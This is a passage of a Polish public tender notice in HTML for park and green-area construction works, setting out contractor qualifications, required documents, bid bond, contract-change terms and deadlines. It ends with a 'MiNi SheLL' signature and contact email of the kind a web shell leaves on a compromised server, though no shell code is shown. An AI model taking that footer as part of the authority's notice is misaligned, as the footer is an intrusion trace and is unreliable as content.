obrocie gospodarczym:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. <br/>3) sytuacji ekonomicznej i finansowej: <br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 400 000 zł brutto. <br/>4) zdolności technicznej lub zawodowej:<br/>a) Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże że:<br/>w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał lub wykonuje co najmniej 1 (jedną) robotę budowlaną (budowa lub przebudowa lub rozbudowa lub remont lub modernizacja) polegająca na urządzaniu terenów zielonych lub parków wraz z małą architekturą o wartości min. 400 000 00 zł brutto (słownie: czterysta tysięcy złotych 00/100); <br/><br/>b) Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że: <br/>- posiada Kierowników budów:<br/>	- Kierownika budowy w specjalności konstrukcyjno-budowalnej - posiadający uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz zrzeszoną we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (tekst jednolity: Dz. U. z 2019r. poz.117) lub spełniającą warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2025 r. poz. 418), tj. osobą, której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniającą wymogi, o których mowa w art. 20a ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa („świadczenie usług transgranicznych”). Posiadający min. 3 letnie doświadczenie.<br/>	- Kierownika budowy w specjalności sanitarnej, posiadający uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych, kanalizacyjnych i gazowych lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz zrzeszoną we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (tekst jednolity: Dz. U. z 2019r. poz.117) lub spełniającą warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2025 r. poz. 418), tj. osobą, której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniającą wymogi, o których mowa w art. 20a ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa („świadczenie usług transgranicznych”).Posiadający min. 3 letnie doświadczenie.<br/>	- Kierownika budowy w specjalności elektrycznej, posiadający uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz zrzeszoną we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (tekst jednolity: Dz. U. z 2019r. poz.117) lub spełniającą warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2025 r. poz. 418), tj. osobą, której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniającą wymogi, o których mowa w art. 20a ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa („świadczenie usług transgranicznych”). Posiadający min. 3 letnie doświadczenie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wyp. i podp kwalif podp elektr/ os/ zauf przez Wyk FO – zał nr 1 do SWZ i umowy; Podp. kwalif podp elekt/ os/ zauf przez Wyk projekt umowy – zał nr 2 do SWZ, Podp kwalif podp elektr/ os/ zauf przez Wyk wzór prot odb wyk robót (częśc/końc) – zał nr 2 do umowy; 2) Podp kwalif podp elektr/ os/ zauf przez Wyk wzór prot odb końc robót – zał nr 3 do umowy; Wyp i podp kwalif podp elektr/ os/ zauf przez Wyk ośw -zał nr 3 do SWZ; Wyp i podp kwalif podp elektr/ os/ zauf przez Wyk ośw wyk - zał nr 4 do SWZ ; Wyp i podp kwalif podp elektr/os/zauf przez Wyk ośw – zał nr 5 do SWZ; Wyp i podp kwalif podp elektr/os/zauf przez Wyk ośw wykonawcy/wykonawców – zał nr 6 do SWZ ; 7. Wyp i podp kwalif podp elektr/ os/ zauf przez Wyk ośw art. 13 i art. 14 RODO - załk nr 7 do SWZ; Pełnom; Ośw - zał nr 8 do SWZ; Wykaz robót bud wyk nie wcześniej niż w okr ost 5 lat, a jeżeli okres dział jest krótszy – w tym okresie, wraz z pod ich rodz, wart, daty i miej wyk oraz podm, na rzecz których rob te zost wyk, oraz zał dow okr, czy te rob bud zost wyk nal, na potw Wyk musi wyk, że: wyk lub wykon co najmniej 1 (jedną) rob bud (bud lub przeb lub rozb lub rem lub moder) pol na urzu ter ziel lub parków wraz z małą arch o wart min. 400 000 00 zł brutto - (wg zała nr 9 do SWZ); Wyk osób, skier przez Wyk do real zam publ, w szcz odp za św usług, kont jak lub kier rob bud, wraz z inf na tem ich kwal zaw, upr, dośw i wykszt niezb do wyk zam publ, a także zakr wyk przez nie czyn oraz inf o podst do dysp tymi os na potw Wyk win wyk, iż zatrudni: Kier bud w spec konstr-bud - Posiadający min. 3 letnie doświadczenie.<br/>	2) Kierownika budowy w specjalności sanitarnej, posiadający uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych, kanalizacyjnych i gazowych lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz zrzeszoną we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (tekst jednolity: Dz. U. z 2019r. poz.117) lub spełniającą warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2025 r. poz. 418), tj. osobą, której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniającą wymogi, o których mowa w art. 20a ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa („świadczenie usług transgranicznych”).Posiadający min. 3 letnie doświadczenie.<br/>	3) Kierownika budowy w specjalności elektrycznej, posiadający uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz zrzeszoną we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (tekst jednolity: Dz. U. z 2019r. poz.117) lub spełniającą warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2025 r. poz. 418), tj. osobą, której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniającą wymogi, o których mowa w art. 20a ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa („świadczenie usług transgranicznych”). Posiadający min. 3 letnie doświadczenie. (załącznik nr 10 do SWZ).<br/>17. Dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem niniejszego zamówienia. Suma gwarancyjna na jedno zdarzenie nie może być mniejsza niż: 400 000 PLN.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wyp. i podp kwalif podp elektr/ os/ zauf przez Wyk FO – zał nr 1 do SWZ i umowy; Podp. kwalif podp elekt/ os/ zauf przez Wyk projekt umowy – zał nr 2 do SWZ, Podp kwalif podp elektr/ os/ zauf przez Wyk wzór prot odb wyk robót (częśc/końc) – zał nr 2 do umowy; 2) Podp kwalif podp elektr/ os/ zauf przez Wyk wzór prot odb końc robót – zał nr 3 do umowy; Wyp i podp kwalif podp elektr/ os/ zauf przez Wyk ośw -zał nr 3 do SWZ; Wyp i podp kwalif podp elektr/ os/ zauf przez Wyk ośw wyk - zał nr 4 do SWZ ; Wyp i podp kwalif podp elektr/os/zauf przez Wyk ośw – zał nr 5 do SWZ; Wyp i podp kwalif podp elektr/os/zauf przez Wyk ośw wykonawcy/wykonawców – zał nr 6 do SWZ ; 7. Wyp i podp kwalif podp elektr/ os/ zauf przez Wyk ośw art. 13 i art. 14 RODO - załk nr 7 do SWZ; Pełnom; Ośw - zał nr 8 do SWZ; Wykaz robót bud wyk nie wcześniej niż w okr ost 5 lat, a jeżeli okres dział jest krótszy – w tym okresie, wraz z pod ich rodz, wart, daty i miej wyk oraz podm, na rzecz których rob te zost wyk, oraz zał dow okr, czy te rob bud zost wyk nal, na potw Wyk musi wyk, że: wyk lub wykon co najmniej 1 (jedną) rob bud (bud lub przeb lub rozb lub rem lub moder) pol na urzu ter ziel lub parków wraz z małą arch o wart min. 400 000 00 zł brutto - (wg zała nr 9 do SWZ); Wyk osób, skier przez Wyk do real zam publ, w szcz odp za św usług, kont jak lub kier rob bud, wraz z inf na tem ich kwal zaw, upr, dośw i wykszt niezb do wyk zam publ, a także zakr wyk przez nie czyn oraz inf o podst do dysp tymi os na potw Wyk win wyk, iż zatrudni: Kier bud w spec konstr-bud - Posiadający min. 3 letnie doświadczenie.<br/>	2) Kierownika budowy w specjalności sanitarnej, posiadający uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych, kanalizacyjnych i gazowych lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz zrzeszoną we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (tekst jednolity: Dz. U. z 2019r. poz.117) lub spełniającą warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2025 r. poz. 418), tj. osobą, której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniającą wymogi, o których mowa w art. 20a ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa („świadczenie usług transgranicznych”).Posiadający min. 3 letnie doświadczenie.<br/>	3) Kierownika budowy w specjalności elektrycznej, posiadający uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz zrzeszoną we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (tekst jednolity: Dz. U. z 2019r. poz.117) lub spełniającą warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2025 r. poz. 418), tj. osobą, której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniającą wymogi, o których mowa w art. 20a ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa („świadczenie usług transgranicznych”). Posiadający min. 3 letnie doświadczenie. (załącznik nr 10 do SWZ).<br/>17. Dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem niniejszego zamówienia. Suma gwarancyjna na jedno zdarzenie nie może być mniejsza niż: 400 000 PLN.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów.<br/>2) W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia Wykonawcy zobowiązani są do ustanowienia pełnomocnika. <br/>Pełnomocnictwo powinno zawierać w szczególności wskazanie:<br/> a) postępowanie o zamówienie publiczne, którego dotyczy,<br/>b) wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby, <br/>c) ustanowionego pełnomocnika oraz zakres jego umocowania.<br/>Pełnomocnictwo powinno zostać złożone w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym. Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez notariusza, tj. podpisanej kwalifikowanym podpisem elektronicznym osoby posiadającej uprawnienia notariusza.<br/>12. W przypadku kiedy Wykonawca, polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>13. Zobowiązanie, o którym mowa w ust. 10 tego Rozdziału musi potwierdzać, że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określać w szczególności:<br/>1) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby,<br/>2) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia,<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu zrealizuje przedmiot niniejszego postępowania, o którym mowa w Rozdziale VI niniejszej SWZ.<br/>Zobowiązanie musi być złożone w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym osoby upoważnionej do reprezentowania wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca przystępujący do postępowania zobowiązany jest do wniesienia wadium w wysokości 7 900,00 złotych <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku złożenia oferty wspólnej przez kilka podmiotów, każdy z nich zobowiązany jest przedstawić dokumenty wystawione na niego wymienione w Rozdziale XIV ust. 3,4,5,6 tej SWZ, natomiast pozostałe dokumenty podmioty składają wspólnie, tj. warunki w nich określone są spełnione, gdy podmioty składające ofertę spełniają je łącznie. <br/> 2. Oferta wspólna musi zostać przygotowana i złożona w następujący sposób:<br/> 1) podmioty wspólnie składające ofertę ustanawiają i wskazują Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu o udzielenie niniejszego zamówienia i zawarcia umowy w sprawie zamówienia publicznego – DO OFERTY NALEŻY DOŁĄCZYĆ PEŁNOMOCNICTWO, <br/> 2) oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkie podmioty wspólnie składające ofertę, <br/> 3) każdy z podmiotów składających wspólnie ofertę musi złożyć oświadczenie, że nie podlega wykluczeniu z postępowania na podstawie art. 108 ust. 1 u.p.z.p. oraz musi złożyć odnoszące się do niego dokumenty, wymienione w Rozdziale XIV ust. 3,4,5,6 tej SWZ.<br/> 3. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem. <br/>4. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia, których oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o realizację niniejszego zamówienia są zobowiązani dostarczyć Zamawiającemu stosowną umowę regulującą współpracę tych Wykonawców.<br/>5. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia ponoszą solidarną odpowiedzialność za wykonanie niniejszego zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Niedop jest pod ryg nieważ zm post umowy, w stos do treści FO, stan zał nr 1 do umowy, będ integ cz umowy, na podst kt dok wyb Wyk, z wyj syt przew w tej umowie, a tak za wyj przyp przew w art. 455 ust. 1 pkt 3 i art. 455 ust. 2 u.p.z.p. Każda ze str ma ob niezw pis zaw o ew potrze dok zm w umowie, wraz ze stos uzas z zastrz ust. 3 tego Rozdz. Wyk przedł Zam pisem wn dot prop zmian, zaw: dokł opis prop przez Wyk zm; szczeg uzas dla dok zmian; opis wpł zm na term wyk umowy; inne ist inf mog mieć wpł na wyk umowy. Zam przeds Wyk pisem odp odn zaprop zm, o której mowa w ust. 2 tego Rozdz, niezwł, a w przyp braku możl udz niezwł odp, nie póź niż w ter 5 dni rob, licz od dnia otrzym wn, o którym mowa w ust. 3 tego Rozdz; Zam zastrz sobie możl dok zm post umowy: w przyp zm term zak robót, o okres trw przycz, z pow kt będzie zagr dotrzym term zakończ robót, w syt;) wyst niekorz war atmosf uniemożl praw wyk rob, zg z techn real prac okr umową, norm lub inn przep, wym konkr war atmosf, jeż kon wyk prac w tym okr nie jest nast okol, za kt Wyk pon odp,<br/>b) w przyp, gdy wyst opóźn nie z winy Wyk w wydu decji, zezw, uzg, itp., do wyd kt właś org są zob na mocy przep pr, jeż opóźn przekr okres, przew w przep pr, w kt wyżej wym dec pow zost wyd, w przyp utr w nal wyk przedm um, o kt mowa w § 2 um, niezaw przez Wyk i niemożl do przezw bez niepropor dużo nakł sił i śr - wydłu term wyk umowy, nie może przekr okr trw wskaz utrud,w przyp opóź w wyk umowy, o kt mowa w § 2 um, wynik z przycz obiekt, niemożl do dokł przew – term może zostać wydł o nie więcej niż o czas trw przeszk w wyk przedm um; w przyp żąd zm um, w zakr mat, param techn, technol wyk robót, spos i zakr wyk przedm um, w nast syt koniecz zrealiz jakiejk czi rob, przy zast odm rozw techn lub technol, niż wsk w dok proj, stan zał nr 5 do um, a wynik ze stw wad tej dok lub zm stanu prawn w op o który je przygot, gdyby zastos przew rozw groz niewyko lub nienal wyk przedm um,<br/>wyst war geolo, geotechn lub hydrol odbieg w spos ist od przyj w dok proj, stan zał nr 5 do um, będ int cz um, rozpoz ter w zakr znal archeol, wyst niewyb lub niewyp, kt mogą skutk w św dot zał niewyk lub nienal wyk przedm um,<br/>wyst war ter robót, odbieg w spos ist od przyj w dok proj stan zał do um, będ integr cz um w szcz napot niezinwent lub bł zinwent sieci, inst lub in ob bud,<br/>kon zreal przedm um, o kt mowa w § 2 um, przy zast in rozw techn lub materiał ze wzg na zm obow prawa lub okol gosp, kon wyk rob, zamh lub dodat, <br/>w zakr popr jak lub inh par charakt dla obj prop zm elemu rob, lub zm techn na korzys lub nowocz, aktua rozw projek z uw na post techn lub zm obow przep<br/>w zakr ceny na podst zm obow stawki pod od tow i usług VAT - w przyp zm sta pod VAT, cena netto nie ul zm, a cena brutto zmieni się w wys i term wynik z aktu praw wprow nową stawkę. W takim przyp wynagr bru odp ul zm;<br/>wynagr net i bru w przyp, gdy zm ta jest korz dla Zam tj. w przyp obn wart net i bru wynagr Wyk, bez równ zm zakr przed um, także w przyp zm w obow przep prawa, maj wpływ na koszt wyk przedm um; dost post um, do zm przep pr w przyp wyst zm powsz obow przep prawa w zakr maj wpływ na wyk um;<br/>okol leż wył po stronie Zam;) zm produc urz lub wypos, na inne o param i jak nie niższ niż urz lub wyp zastęp; term wyk robót, w zw ze wstrzym wyk cał lub cz rob, o kt mowa w § 2 um, na wsku wyst okol niezal od Wyk i niemożl do przew w chwili zaw um;) wprow na ter rob bud-mont, o kt mowa w § 2 um, podwyk lub dalsz podwyk po wcześ pisemn uzgod z Zam w form pap lub e-mail lub dok ich zm; zm osob/osób wykon przedm um, wskaz przez Wyk, pod warkiem spełniania przez nie wymogów dla osób uczestniczących w realizacji przedmiotu umowy, o którym mowa w § 2 umowy, oraz pisemnej akceptacji Zamawiającego danej osoby.<br/>6. W przypadku zmiany, o której mowa w ust. 5 pkt 10 tego Rozdziału, Wykonawca zobligowany będzie przedłożyć Zamawiającemu wykaz zatrudnionych do realizacji niniejszej umowy, pracowników, dla których ma zastosowanie zmiana zasad. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-08 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-08 11:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-09-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com